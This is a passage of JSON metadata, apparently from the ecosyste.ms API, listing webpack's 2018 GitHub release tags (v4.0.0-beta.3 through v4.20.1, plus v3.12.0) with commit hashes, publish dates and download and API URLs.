ries/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifes